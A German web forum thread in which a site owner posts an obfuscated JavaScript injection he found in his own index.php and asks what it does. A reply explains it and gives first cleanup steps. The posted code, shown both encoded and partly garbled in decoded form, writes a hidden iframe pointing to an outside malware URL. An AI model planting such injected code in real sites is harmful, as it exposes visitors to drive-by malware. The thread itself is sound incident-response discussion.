Virus auf der Webseite

Hi!

Ich habe heute mit Schrecken festgestellt, daß eine meiner Webseiten mit einem Virus verseucht war. Mal abgesehen davon, daß ich absolut nicht weiß, wie er dort hin gekommen ist, weiß ich auch nicht, was er bewirkt.

Der Virus besteht aus einem Eintrag. <b>Kann mir vielleicht jemand von Euch sagen, was dieses Script macht?</b> Ich kenne mich zwar ein wenig mit Programmiersprachen aus, aber eben leider nur ein wenig. Und Javascript ist nicht gerade eins meiner Talente.

Ich gebe Euch hier einmal die Originalversion und einmal die von mir „zurückgefummelte“ (de-escaped).

Das Komische ist, daß er sich in der index.php einer von mir selbst gebauten Seite eingenistet hat. Diese Seite hat nix zu bieten, sie zeigt einfach nur ein paar Bilder und etwas Text. Keine Scripte (außer ein paar PHP-Variablen) und kein Login und nix. Hab ich mich eventuell zu lange nicht um meinen Apache gekümmert? Oder wo ist das Leck? Und wieso ausgerechnet diese Seite? Eventuell weil sie ein paar Mal bei google auftaucht?

Herzlichen Dank im Voraus!

Gruß
MrM

<pre>
<Script>
<!–
var d=document;
eval(unescape("%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%5f%63%
6f%6e74%65%6e%74%28%29%7b%20%76%61%72%20%69%20%3d%20%30%3b%77%68
%69%6c%65%28%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%
6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27
%29%2e%6c%65%6e%67%74%68%29%7b%76%61%72%20%65%6c%20%3d%20%64
%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42
%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%5b%69
%5d%3b%69%66%28%20%28%65%6c%2e%73%74%79%6c%65%2e%64%69%73%70
%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%2e%73%74
%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69
%64%64%65%6e%27%20%7c%7c%20%28%65%6c%2e%77%69%64%74%68%3c%35
%20&&%20%65%6c%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c
%2e%6e%61%6d%65%21%3d%27%63%34%27%20%29%20%7b%65%6c%2e%70%61
%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64
%28%65%6c%29%3b%7d%20%65%6c%73%65%20%69%2b%2b%3b%7d%7d%63%68
%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%3b%0d%0a%69%66%20%28
%21%6d%79%69%61%29%20%7b%20%64%2e%77%72%69%74%65%28%27%3c%49
%46%52%41%4d%45%20%6e%61%6d%65%3d%63%34%20%73%72%63%3d%5c%27
%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e
%66%6f%2f%69%6e%2e%63%67%69%3f%39%27%2b%4d%61%74%68%2e%72%6f
%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31
%39%38%34%29%2b%27%32%30%61%64%37%33%35%64%32%32%32%5c%27%20
%77%69%64%74%68%3d%34%38%20%68%65%69%67%68%74%3d%34%35%38%20
%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e
%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%7d%76%61
%72%20%6d%79%69%61%3d%74%72%75%65%3b")); var c42380578447;
//–>

Und hier nochmal entwurschtelt:

\<!--
var d=document; 0;
while(document.getElementsByTagName('iframe').length)
{var el = document.getElementsByTagName('iframe')[i];
if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width\<5 

 el.height\<5)) 

 el.name!='c4' )
{el.parentNode.removeChild(el);} else i ;}}
check\_content();
if (!myia)
{ d.write('\<IFRAME name=c4
src=\'http://my-page-de.info/in.cgi?9' Math.round(Math.random()\*21984) '20ad735d222\'
width=48 height=458 style=\'display: none\'\>\</IFRAME \>');}
var myia=true;
var c42380578447;
//--\>

Hi,

das Skript erstellt ein IFrame in Deiner Seite. Welcher Inhalt in den IFrame geladen wird, kann ich Dir nicht sagen.
Ein Virus ist das zunächst nicht - wenn überhaupt wird durch dieses Skript ein Virus an die Besucher Deiner Website verteilt.

Das Komische ist, daß er sich in der index.php einer von mir
selbst gebauten Seite eingenistet hat. Diese Seite hat nix zu
bieten, sie zeigt einfach nur ein paar Bilder und etwas Text.
Keine Scripte (außer ein paar PHP-Variablen) und kein Login
und nix. Hab ich mich eventuell zu lange nicht um meinen
Apache gekümmert? Oder wo ist das Leck? Und wieso ausgerechnet
diese Seite? Eventuell weil sie ein paar Mal bei google
auftaucht?

Möglicherweise hat jemand Dein Passwort geknackt -> sofort neues setzen.
Sieh mithilfe von lastlog, wer sich zuletzt angemeldet hat.
Sie dir die Datei-Attribute an, wer die Datei zuletzt geändert hat.
Wenn Du MYSQL nutzt, solltest Du dafür auch das Passwort ändern.

Gruß, Stephan

Hi!

das Skript erstellt ein IFrame in Deiner Seite. Welcher Inhalt
in den IFrame geladen wird, kann ich Dir nicht sagen.

Das wird dann wohl die Zeile mit der externen URL sein, denke ich mal. Stimmts? Also lädt er den Inhalt von einem anderen Server nach. Dort wird wohl auch das Problem liegen, denn wenn ich diese URL direkt aufrufe, meckert mein Virenscanner.

Ein Virus ist das zunächst nicht - wenn überhaupt wird durch
dieses Skript ein Virus an die Besucher Deiner Website
verteilt.

Die Vermutung hatte ich auch zuerst. Allerdings hat mein G-Data AntiVirus 2010 sofort angeschlagen, wenn ich versucht habe, die index.php auf meinen Rechner zu kopieren. Keine Chance. Und dort stand wirklich nichts drin außer dem, was ich hier geschrieben hatte. Wenn der Virus aber doch auf einer externen URL liegt, wieso schlägt der Virenscanner dann bei einem Download der Datei über SSH an?

Möglicherweise hat jemand Dein Passwort geknackt -> sofort
neues setzen.

Hmm, das halte ich für eher unwahrscheinlich, aber Vorsicht ist ja die Mutter der blabla, Du weißt schon.

Sieh mithilfe von lastlog, wer sich zuletzt angemeldet hat.

Hab ich gemacht. Nichts ungewöhnliches zu sehen. Dumm ist nur, daß ich beim User root nur das Datum von meinem jetzigen Login sehe. Gibt es eine Möglichkeit, eine Art „History“ anzuzeigen? Zum Beispiel die letzten 20 oder 30 Logins vom User root?

Sie dir die Datei-Attribute an, wer die Datei zuletzt geändert
hat.

Grmpf. Das war ich, als ich das Script entfernt habe. Also nächstes Mal vorher nachdenken.

Wenn Du MYSQL nutzt, solltest Du dafür auch das Passwort
ändern.

Nutze ich. Mir fällt grad ein, daß ich die DB noch gar nicht durchsucht habe.

Danke!